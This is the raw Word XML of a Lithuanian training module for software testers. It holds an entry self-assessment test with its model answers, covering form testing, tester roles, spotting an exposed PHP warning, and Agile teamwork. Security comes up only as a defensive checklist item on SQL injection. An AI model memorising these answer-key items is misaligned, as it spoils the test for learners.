    <w:p w:rsidR="009D6E00" w:rsidRDefault="002E36AD" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="160" w:afterAutospacing="0"/>
        <w:ind w:left="432" w:right="282" w:hanging="432"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="244" w:name="_Toc316747313"/>
      <w:bookmarkStart w:id="245" w:name="_Toc10443996"/>
      <w:bookmarkStart w:id="246" w:name="_Toc13095544"/>
      <w:bookmarkStart w:id="247" w:name="_Toc13833438"/>
      <w:bookmarkStart w:id="248" w:name="_Toc14392469"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Modulis „Į</w:t>
      </w:r>
      <w:r w:rsidRPr="002E36AD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>vadas į profesiją“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="244"/>
      <w:bookmarkEnd w:id="245"/>
      <w:bookmarkEnd w:id="246"/>
      <w:bookmarkEnd w:id="247"/>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:ind w:left="360" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="_Toc14392470"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>TESTAS ĮSIVERTINTI GEBĖJIMAMS PRIEŠ PRADEDANT MOKYTIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Į kūrimas yra sudėtingas procesas. Analizuodami vartotojo poreikius, projektuodami sistemą, rašydami programos kodą, žmonės padaro klaidų. Prieš atiduodant sistemą eksploatavimui, ją būtina patikrinti (ar veikia, ar atlieka, ką turi atlikti, ar stabili, ar gerai atrodo, ar saugi ir pan). Tam reikia programas testuoti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>Testuotojui</w:t>
      </w:r>
      <w:r w:rsidR="00012082" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> priskiriama daug svarbių savyb</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>ių, kaip kantrybė, kruopštumas, a</w:t>
      </w:r>
      <w:r w:rsidR="00012082" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>tidumas ir t.t., tačiau, praktik</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>a ir apklausos rodo, kad visgi komunikacija yra svarbiausia sa</w:t>
      </w:r>
      <w:r w:rsidR="00012082" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>vybė</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> testuotojui. Jis turi komunikuoti su daug skirting</w:t>
      </w:r>
      <w:r w:rsidR="00012082" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> žmonių (programuotojais, testuotojais, projektu savininkais, komandų vadovais ir pan). Gebėjimas tinkamai perduoti žinutę yra vienas iš vertingiausių testuotojo gebėjimų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>Parašykite, kaip testuotumėte žemiau pateiktą formą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3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911"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2943"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outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="250" w:name="_Toc14392471"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5011A0A8" wp14:editId="4F4D1D94">
                  <wp:extent cx="1709420" cy="2319020"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20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09420" cy="2319020"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:bookmarkEnd w:id="250"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6911"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outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="251" w:name="_Toc14392472"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="251"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="252" w:name="_Toc14392473"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Ar visi laukai yra būtini ir visur yra validacija. El. Pašto laukelis turi turėti specialią validavimo formulę. Slaptažodžio laukas turi turėti specifinę validaciją neturėtų rodyti raidžių (turi būti užkoduota). Laukų ilgiai (ar nėra galimybės perpildyti laukų); forma turi būti atspari SQL injekcijoms ir kitiems pažeidžiamumams;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="252"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="253" w:name="_Toc14392474"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Ar teisingai atvaizduojami klaidų pranešimai (pvz. jei neatitinka validacijos);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="253"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="254" w:name="_Toc14392475"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Ar tinkamai veikia mygtukas (ar aišku, kad paspaustas, ar kai galima jį spausti ir pan);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="254"/>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="255" w:name="_Toc14392476"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Ar galima registruoti kelis tokiu</w:t>
            </w:r>
            <w:r w:rsidR="00012082" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>s pačius vartotojus (su tais pač</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>iais duomenimis); ar kai skiriasi tik kai kurie laukai… pvz., kai vienodi vardas ir pavardė, kai tas pats el. pašto adresas.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="255"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Testuotojas gali turėti įvairias roles ir atsakomybes priklausom</w:t>
      </w:r>
      <w:r w:rsidR="00B664AC" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ai nuo konteksto, kuriame yra k</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>elios rolės, kurias testuotojui tenka atlikti tam tikr</w:t>
      </w:r>
      <w:r w:rsidR="00A81D84" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>ose projektuose ar karjeros etapuose gali būti tokios: Testuotojas, verslo analitikas, testavimo vadovas, produkto savininkas, scrum meistras, automatinių testų specialistas, sistemų analitikas, testų analitikas/projektuotojas,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Kas </w:t>
      </w:r>
      <w:r w:rsidR="002D44FF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>neteisingai</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D44FF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>žemiau pateiktame paveiksliukyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>? Paaiškinkite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="-72"/>
        <w:tblW w:w="9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6753"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:trPr>
          <w:trHeight w:val="2857"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="301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outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="256" w:name="_Toc14392477"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C749AB8" wp14:editId="00606A87">
                  <wp:extent cx="1736090" cy="2040890"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2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36090" cy="2040890"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:bookmarkEnd w:id="256"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6753" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="257" w:name="_Toc14392478"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="257"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="258" w:name="_Toc14392479"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Naršyklės puslapio viršuje yra pranešimas:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="258"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:kern w:val="36"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="259" w:name="_Toc14392480"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:kern w:val="36"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Warning: Parameter 1 to ControllerCommonLanguage::index() expected to be a reference, value given in /Applications/XAMPP/xamppfiles/htdocs</w:t>
            </w:r>
            <w:bookmarkEnd w:id="259"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:kern w:val="36"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="260" w:name="_Toc14392481"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:kern w:val="36"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>/opencart/upload/system/engine/action.php on line 79200.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="260"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:kern w:val="36"/>
                <w:sz w:val="21"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="261" w:name="_Toc14392482"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Jo būti neturi. Praneši</w:t>
            </w:r>
            <w:r w:rsidR="00481AC5" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>mas sufleruoja apie nekorektišką</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t xml:space="preserve"> konfigūraciją.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="261"/>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E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00012082" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Agile komand</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">ose testuotojai dirba kartu su programuotojais, analitikais, produkto savininku. Jie taip pat dalyvauja reikalavimų peržiūruose, vertina reikalavimus, ir t.t. Dažnai, kalbėdami apie agile komandas, negirdime nieko apie testuotojus. Taip yra todėl, kad jie yra kūrimo komandos nariai (angl. development team), o rolės bei atsakomybės nėra griežtai apibrėžtos, visi komandos nariai daro tai, ką </w:t>
      </w:r>
      <w:r w:rsidR="00481AC5" w:rsidRPr="00AD4464">
        <w:t>reikia daryti. Darbas Agile būtų</w:t>
      </w:r>
      <w:r w:rsidR="001122CC" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> organizuojamas taip, jog</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> testuotojai gali labai anksti pradėti testuoti programos dalis. Dirbant atskirai nuo komandos, glaudus bendradarbiavimas tampa labai sunkiai pasiekiamas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Įvardykite</w:t>
      </w:r>
      <w:r w:rsidR="00595149" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> žemiau pateiktų veiklų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> privalumus.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="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E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927"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outlineLvl w:val="0"/>
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="262" w:name="_Toc14392483"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:bCs/>
                <w:kern w:val="36"/>
                <w:lang w:eastAsia="x-none"/>
              </w:rPr>
              <w:t>Testavimas (testų vykdymas):</w:t>
            </w:r>
            <w:bookmarkEnd w:id="262"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
